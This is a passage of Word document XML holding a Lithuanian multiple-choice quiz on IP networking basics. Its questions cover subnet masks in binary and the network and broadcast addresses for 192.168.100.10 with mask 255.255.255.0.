        <w:t>teisingas?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CB33F2" w14:textId="20DF1B14" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>1 1 1 1 1 1 1 1</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B949AF1" w14:textId="2A1E838B" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>1 1 1 1 1 1 1 0</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F08C2BA" w14:textId="6FA92497" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>1 1 1 1 1 1 0 0</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2335BB" w14:textId="46ED9E6E" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>1 0 0 0 0 0 0 0</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D130CE" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F4A4201" w14:textId="193137C7" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Ką vadiname tinklo / potinklio IP adresu?</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="_Hlk67729619"/>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2ED2DACF" w14:textId="20FEEE9F" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Tai įrenginio IP adresas</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2104BF" w14:textId="6F1508C6" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Tai paskutinis IP adresas iš tinklą / potinklį apibūdinančios aibės</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC01384" w14:textId="14FE8AEB" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Tai transliacinis IP adresas</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B979A8" w14:textId="04241DEF" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Tai pirmas IP adresas iš tinklą / potinklį apibūdinančios aibės</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247CFF8B" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A644558" w14:textId="439148C1" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve">Ką vadiname transliaciniu (angl. </w:t>
      </w:r>
      <w:r w:rsidR="00EB0D87" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>broadcast) IP adresu?</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C5369C" w14:textId="6A033675" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Tai paskutinis IP adresas iš tinklą / potinklį apibūdinančios aibės</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCCB8E4" w14:textId="184D0CDC" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Tai transliacinis IP adresas</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDDE1D6" w14:textId="5EF30C0B" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Tai pirmas IP adresas iš tinklą / potinklį apibūdinančios aibės</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2DB4DF" w14:textId="2D21DDB6" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Tai įrenginio IP adresas</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66809897" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E6AC0EE" w14:textId="6CCF32E1" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00575225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Ž</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>inome, kad įrenginio IP adresas yra 192.168.100.10, o tinklo kaukė 255.255.255.0</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>. K</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>oks bus visą tinklą nusakantis IP adresas?</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10784FC4" w14:textId="63DFE1A4" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>192.168.100.0</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7298DBDB" w14:textId="1EE02CD1" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>192.168.100.10</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D374F9A" w14:textId="19241868" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>192.168.100.100</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF5A846" w14:textId="18C91664" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>192.168.100.255</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544583D5" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DF6CB5" w14:textId="72541D57" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00575225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Ž</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>inome, kad įrenginio IP adresas yra 192.168.100.10, o tinklo kaukė 255.255.255.0</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>. K</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>oks</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve">bus </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>tinklo BROADCAST IP adresas?</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5A0590" w14:textId="087C4C60" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
